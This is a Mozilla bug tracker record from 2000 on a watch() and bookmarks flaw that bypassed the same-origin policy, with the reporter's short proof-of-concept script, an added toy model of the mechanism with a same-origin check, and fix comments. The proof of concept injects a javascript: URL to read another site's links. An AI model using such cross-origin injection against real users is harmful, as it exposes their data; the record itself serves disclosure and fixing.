Closed
Bug 28390
Opened 26 years ago
Closed 26 years ago
watch() and bookmarks vulnerability
Categories
(Core :: Security, defect, P3)
Tracking
VERIFIED
FIXED
M16
People
(Reporter: norrisboyd, Assigned: norrisboyd)
Subject: BUG: watch() and bookmarks vulnerability
Date: Fri, 18 Feb 2000 16:13:34 +0200
From: Georgi Guninski <joro@nat.bg>
To: Norris Boyd <norris@netscape.com>
The watch() method when applied to window.location.href allows
circumventing Same Origin security policy.
But user interaction is required - selecting any bookmark from the menu
of the target window.
The code is:
-------------------------------------------------
Select a bookmark from the menu of the other window.
<SCRIPT>
a=window.open("http://www.yahoo.com","victim");
a.location.watch("href",function (id,oldval,newval) { return "javascript:alert('The first link is:' +document.links[0].href)"; });
</SCRIPT>
-------------------------------------------------
watch() vulnerability.
Select a bookmark from the menu of the other window.
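The mechanism in the report above, modelled as an added example (not code from this bug or from the fix, which this page does not show). The `Win` class, the `.example` origins and the placeholder payload are constructed for illustration, and the same-origin check in `watch` is an assumed mitigation, one way such a hook can be gated.

```javascript
// Toy model, not browser code: Win, navigate and the origin strings are constructed.
class Win {
  constructor(origin, sameOriginCheck) {
    this.origin = origin;
    this.sameOriginCheck = sameOriginCheck; // assumed mitigation switch
    this.href = origin + "/";
    this.watchers = {};   // property name -> handler
    this.scriptsRun = []; // javascript: URLs "executed" in this window
  }

  // Models location.watch(prop, handler) called by script from callerOrigin.
  watch(callerOrigin, prop, handler) {
    if (this.sameOriginCheck && callerOrigin !== this.origin) {
      throw new Error("watch() denied: " + callerOrigin + " is not " + this.origin);
    }
    this.watchers[prop] = handler;
  }

  // Models a navigation started by the user (picking a bookmark).
  navigate(url) {
    const handler = this.watchers.href;
    // As with watch(), the handler's return value replaces the value being assigned.
    const finalUrl = handler ? handler("href", this.href, url) : url;
    if (finalUrl.startsWith("javascript:")) {
      // A javascript: URL runs in the context of the window being navigated.
      this.scriptsRun.push({ runsAs: this.origin, code: finalUrl.slice(11) });
    } else {
      this.href = finalUrl;
    }
  }
}

// Returns what ran in the victim window and where it ended up.
function simulate(sameOriginCheck) {
  const victim = new Win("http://victim.example", sameOriginCheck);
  const rewrite = () => "javascript:readFirstLink()"; // placeholder payload
  try {
    victim.watch("http://attacker.example", "href", rewrite);
  } catch (e) {
    // Hardened model: the cross-origin watchpoint was never installed.
  }
  victim.navigate("http://bookmark.example/");
  return { scriptsRun: victim.scriptsRun, href: victim.href };
}
```

With the check off, the bookmark navigation is replaced by script recorded as running under the victim's origin; with it on, the bookmark simply loads.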
Assignee
Updated•26 years ago
Group: netscapeconfidential?
Status: NEW → ASSIGNED
Target Milestone: M15
Bulk moving all Browser Security bugs to new Security: General component. The
previous Security component for Browser will be deleted.
Component: Security → Security: General
Assignee
Comment 3•26 years ago
Add test case.
Assignee
Comment 4•26 years ago
Fix checked in.
Status: ASSIGNED → RESOLVED
Closed: 26 years ago
Resolution: --- → FIXED
Comment 5•26 years ago
Norris - what is the expected behavior? What I see with Seamonkey is that when
selecting a bookmark in the second window, nothing happens. With Nova, the
bookmark selected is opened in the new window.